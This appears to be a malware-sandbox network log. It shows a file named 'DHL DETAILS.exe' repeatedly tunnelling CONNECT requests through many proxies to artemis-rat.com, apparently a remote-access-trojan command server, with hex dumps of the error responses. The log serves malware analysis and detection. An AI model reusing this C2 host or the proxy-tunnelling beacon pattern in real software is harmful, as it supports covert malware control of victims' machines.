                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.685842037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.736524105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1383192.168.2.55212745.195.149.7910806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.695923090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1384192.168.2.55323867.201.59.7041456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.720663071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1385192.168.2.55402494.45.74.6080806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.727255106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1386192.168.2.552712120.78.191.68806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.727359056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.064563036 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                                                                                    Mar 9, 2024 13:14:19.064747095 CET318INHTTP/1.1 400 Bad Request
                                                                                    Server: openresty
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Content-Length: 154
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1387192.168.2.55404623.137.248.197806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.727911949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1388192.168.2.552218112.51.96.11890916352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.745417118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.456099033 CET325INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.12.1
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 173
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1389192.168.2.552791138.36.150.1510806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.745420933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.567734003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1390192.168.2.55402791.202.230.21980806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.753351927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1391192.168.2.554044138.36.199.1441536352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.769315958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1392192.168.2.55431243.134.230.1224436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.771693945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1393192.168.2.554130172.67.181.58806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.771697044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.925715923 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1394192.168.2.55431443.134.230.1224436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.773003101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1395192.168.2.55431643.134.230.1224436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.774507999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1396192.168.2.55432043.134.230.1224436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.776165009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1397192.168.2.554117199.188.93.21490006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.776287079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1398192.168.2.553193192.111.137.3541456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.779041052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1399192.168.2.552759103.146.137.510816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.781474113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1400192.168.2.55403793.90.212.241536352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.788888931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1401192.168.2.553770117.160.250.16399906352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.791241884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.505497932 CET303INHTTP/1.1 400 Bad Request
                                                                                    Server: openresty
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 154
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1402192.168.2.554076103.75.85.14011116352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.791974068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.536556959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.536883116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1403192.168.2.554139104.18.161.122806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.792121887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.946259975 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1404192.168.2.554141104.24.236.203806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.792965889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.947375059 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1405192.168.2.552817138.197.148.215806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.800947905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.833414078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:24.833266973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.834053040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1406192.168.2.554156104.20.89.77806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.807368994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.962301016 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1407192.168.2.55407727.65.114.810806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.846880913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


